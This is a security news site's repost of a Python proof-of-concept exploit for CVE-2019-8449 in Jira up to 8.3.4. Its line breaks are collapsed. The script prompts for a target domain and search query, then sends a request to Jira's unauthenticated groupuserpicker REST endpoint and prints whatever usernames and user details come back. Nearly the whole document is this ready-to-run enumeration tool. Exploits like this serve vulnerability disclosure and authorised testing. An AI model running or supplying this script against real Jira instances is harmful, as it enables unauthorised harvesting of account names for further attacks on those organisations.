HackDig : Dig high-quality web security articles for hackers

«No Previous
No Next

Jira 8.3.4 Information Disclosure

2020-02-04 11:10
# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration)# Date: 2019-09-11# Exploit Author: Mufeed VH# Vendor Homepage: https://www.atlassian.com/# Software Link: https://www.atlassian.com/software/jira# Version: 8.3.4# Tested on: Pop!_OS 19.10# CVE : CVE-2019-8449# CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4# DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/# CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796#!/usr/bin/env python__author__  = "Mufeed VH (@mufeedvh)"import osimport requestsclass CVE_2019_8449:    def ask_for_domain(self):        domain = raw_input("[>] Enter the domain of Jira instance: => ")        if domain == "":            print("n[-] ERROR: domain is requiredn")            self.ask_for_domain()        self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain)    def ask_for_query(self):        self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ")        if self.query == "":            print("n[-] ERROR: The query parameter is requiredn")            self.ask_for_query()        def exploit(self):        self.ask_for_domain()        self.ask_for_query()        maxResults = raw_input("n[>] Enter the number of maximum results to fetch: (50) => ")        showAvatar = raw_input("n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ")        fieldId = raw_input("n[>] Enter the fieldId to fetch: => ")        projectId = raw_input("n[>] Enter the projectId to fetch: => ")        issueTypeId = raw_input("n[>] Enter the issueTypeId to fetch: => ")        avatarSize = raw_input("n[>] Enter the size of Avatar to fetch: (xsmall) => ")        caseInsensitive = raw_input("n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ")        excludeConnectAddons = raw_input("n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ")            params = {            'query': self.query,             'maxResults': maxResults,             'showAvatar': showAvatar,             'fieldId': fieldId,             'projectId': projectId,             'issueTypeId': issueTypeId,             'avatarSize': avatarSize,             'caseInsensitive': caseInsensitive,             'excludeConnectAddons': excludeConnectAddons        }        send_it = requests.get(url = self.url, params = params)        try:            response = send_it.json()        except:            print("n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.")            print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.")            print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url))            quit()                print("n<========== RESPONSE ==========>n")        print(response)        print("n<==============================>n")if __name__ == '__main__':    os.system('cls' if os.name == 'nt' else 'clear')        print('''        ================================================        |                                              |        | CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 |        |  Proof of Concept By: Mufeed VH [@mufeedvh]  |        |                                              |        ================================================    ''')    CVE_2019_8449().exploit()


Source: 5100200202-BLW/eussi/moc.ytirucesxc

Read:1030 | Comments:0 | Tags:No Tag

“Jira 8.3.4 Information Disclosure”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools

Tag Cloud